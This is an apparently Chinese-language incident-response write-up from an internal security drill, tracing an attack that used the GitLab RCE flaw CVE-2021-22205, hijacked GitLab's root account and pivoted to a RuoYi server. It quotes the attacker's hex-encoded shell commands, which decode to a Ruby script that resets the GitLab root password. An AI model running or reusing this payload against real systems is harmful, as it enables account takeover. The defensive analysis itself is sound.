AI 助理
备案控制台
开发者社区 云原生 文章 正文

记一次gitlab应急响应

2023-06-25 178
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
本文涉及的产品
应用实时监控服务-应用监控,每月50GB免费额度
服务治理 MSE Sentinel/OpenSergo,Agent数量 不受限
任务调度 XXL-JOB 版免费试用,400 元额度,开发版规格
简介: 记一次gitlab应急响应

01 事件背景介绍



某内部应急演练中,态势感知平台上出现gitlab RCE漏洞攻击成功告警,现需根据流量情况进行安全事件分析。


02 事件分析过程

根据态势感知平台,确认发起攻击的IP地址,以该地址为源地址进行搜索,寻找攻击痕迹及路径。通过流量分析,判断攻击者首先尝试使用弱口令登陆gitlab,从响应状态判断弱口令没有登陆成功。

image.png

在后续的流量发现存在422响应包,进一步分析攻击者使用gitlab RCE漏洞(CVE-2021-22205)对80.X.X.60成功发起攻击:

image.png

攻击者写入恶意脚本/tmp/.JARRLTW.rb,并执行,成功执行后删除脚本

echo -n 72657175697265202779616d6c270a7265717569726520277067270a636f6e666967203d2059414d4c3a3a6c6f61645f6669 >> /tmp/.JARRLTW.rb
echo -n 6c6528272f7661722f6f70742f6769746c61622f6769746c61622d7261696c732f6574632f64617461626173652e796d6c27 >> /tmp/.JARRLTW.rb
echo -n 295b2770726f64756374696f6e275d0a636f6e6e203d2050472e636f6e6e65637428636f6e6669675b27686f7374275d2c20 >> /tmp/.JARRLTW.rb
echo -n 636f6e6669675b27706f7274275d2c2027272c2027272c20636f6e6669675b276461746162617365275d2c20636f6e666967 >> /tmp/.JARRLTW.rb
echo -n 5b27757365726e616d65275d2c20636f6e6669675b2770617373776f7264275d290a636f6e6e2e6578656328277570646174 >> /tmp/.JARRLTW.rb
echo -n 652075736572732073657420636f6e6669726d6174696f6e5f746f6b656e3d2873656c65637420656e637279707465645f70 >> /tmp/.JARRLTW.rb
echo -n 617373776f72642066726f6d20757365727320776865726520757365726e616d653d5c27726f6f745c27292c656e63727970 >> /tmp/.JARRLTW.rb
echo -n 7465645f70617373776f72643d5c272432612431302436386857326461516b544678614c5478663538427a75744c54414263 >> /tmp/.JARRLTW.rb
echo -n 456264506e633058324451522f4d6946306658744157344f475c272c73746174653d5c276163746976655c27207768657265 >> /tmp/.JARRLTW.rb
echo -n 20757365726e616d653d5c27726f6f745c273b2729 >> /tmp/.JARRLTW.rb
cat /tmp/.JARRLTW.rb | xxd -r -p | tee /tmp/.JARRLTW.rb
/opt/gitlab/embedded/bin/ruby /tmp/.JARRLTW.rb
/usr/bin/rm -rf /tmp/.JARRLTW.rb

还原脚本,具体代码如下图所示

image.png

该脚本更改了gitlab root用户的密码,从302状态码看,攻击者成功利用修改后的密码登陆了gitlab。

image.png

流量记录显示,攻击者存在翻阅源码行为:

image.png

攻击者找到仓库中ruoyi的配置文件,了解到ruoyi登录认证信息;

image.png

image.png


攻击者登录rouyi并添加定时任务:请求并执行恶意jar包

image.png

image.png


通过微步情报在线,进一步确认IP为攻击者IP

image.png



03 事件分析结果



攻击者10.X.X.2利用gitlab RCE漏洞(CVE-2021-22205)写入恶意脚本,修改GitLab root密码,登录后在仓库中翻阅源码找到rouyi配置文件从而成功登录位于50.X.X.40的rouyi并设置定时任务获取远程恶意类命令执行。

04 安全加固建议


1、在安全设备上,如防火墙、IDS上封禁攻击IP:10.X.X.2。

2、 针对本次失陷主机50.X.X.40,进行网络隔离,排查入侵痕迹和内网横向情况,修复gitlab RCE漏洞。

3、重新修改rouyi配置文件,确保配置信息符合安全要求。

文章标签:
Java
网络安全
数据安全/隐私保护
安全
Vista_AX
目录
相关文章
打不倒的小怪瘦
|
3月前
|
监控 安全 Linux
网络安全事件应急响应
应急响应是针对网络安全事件的快速处理流程,包括信息收集、事件判断、深入分析、清理处置、报告产出等环节。具体步骤涵盖准备、检测、抑制、根除、恢复和总结。
打不倒的小怪瘦
231 6
GG2020gg
|
5月前
|
安全
应急响应处置现场流程 - 服务排查06
应急响应处置现场流程 - 服务排查06
GG2020gg
56 5
GG2020gg
|
5月前
|
安全 Linux Shell
应急响应处置现场流程 - 文件痕迹排查笔记07
应急响应处置现场流程 - 文件痕迹排查笔记07
GG2020gg
97 8
听风de歌
|
5月前
|
监控 安全
安全中风险评估与应急响应
【8月更文挑战第11天】
听风de歌
91 2
拈花倾城
|
8月前
|
存储 监控 安全
企业如何建立网络事件应急响应团队?
建立企业网络事件应急响应团队是应对勒索软件等威胁的关键。团队的迅速、高效行动能减轻攻击影响。首先,企业需决定是外包服务还是自建团队。外包通常更经济,适合多数公司,但大型或有复杂IT环境的企业可能选择内部团队。团队包括应急响应小组和技术支持监控团队,前者专注于安全事件处理,后者负责日常IT运维和安全监控。团队应包括安全分析工程师、IT工程师、恶意软件分析师、项目经理、公关和法律顾问等角色。此外,选择合适的工具(如SIEM、SOAR、XDR),制定行动手册、合规政策,创建报告模板,并进行定期训练和演练以确保团队的有效性。外包时,理解团队构成和运作方式依然重要。
拈花倾城
154 1
xiejava
|
运维 监控 安全
认识SOAR-安全事件编排自动化响应
SOAR是最近几年安全市场上最火热的词汇之一。SOAR究竟是什么,发展历程是什么,能够起什么作用,带着这些问题我们来认识一下SOAR。
xiejava
731 0
认识SOAR-安全事件编排自动化响应
雷石安全实验室
|
安全 Linux Shell
记一次应急响应
记一次应急响应
雷石安全实验室
162 0
yuanfan_2012
|
云安全 消息中间件 监控
Apache Log4j2 高危漏洞应急响应处置方法汇总整理
Apache Log4j2 高危漏洞应急响应处置方法汇总整理
yuanfan_2012
801 0
Apache Log4j2 高危漏洞应急响应处置方法汇总整理
bbskkb
|
云安全 监控 负载均衡
信息安全-应急响应-阿里云安全应急响应服务
虽然企业已对业务系统进行了安全防护,如使用了阿里云安全组、web应用防火墙、云防火墙等安全产品,但随着攻击方法的发展,以及新的安全漏洞的出现等情况,业务系统面临着一些未知的潜在的安全风险。为了应对潜在的安全风险,企业需要通过应急响应,来保障现有业务系统的稳定运行。本文将对应急响应的基本原理进行介绍,并结合阿里云“安全应急响应服务”进行分析
bbskkb
1051 0
@北鲲
|
监控 Linux 网络安全
应急检测脚本
当企业被攻击者入侵,系统被挂暗链、内容遭到恶意篡改,服务器出现异常链接、卡顿等情况时,需要进行紧急处理,使系统在最短时间内恢复正常。由于应急处理往往时间紧,所以尝试将应急中常见处理方法整合到脚本中,可自动化实现部分应急工作。应急脚本采用 python2.0 完成,由于所有需要执行的命令都是依靠 ssh 进行远程链接,所以在运行脚本之前,需要输入正确的主机 ip 地址、ssh 远程连接端口、ssh 远程登录账户、ssh 远程登录密码。
@北鲲
251 0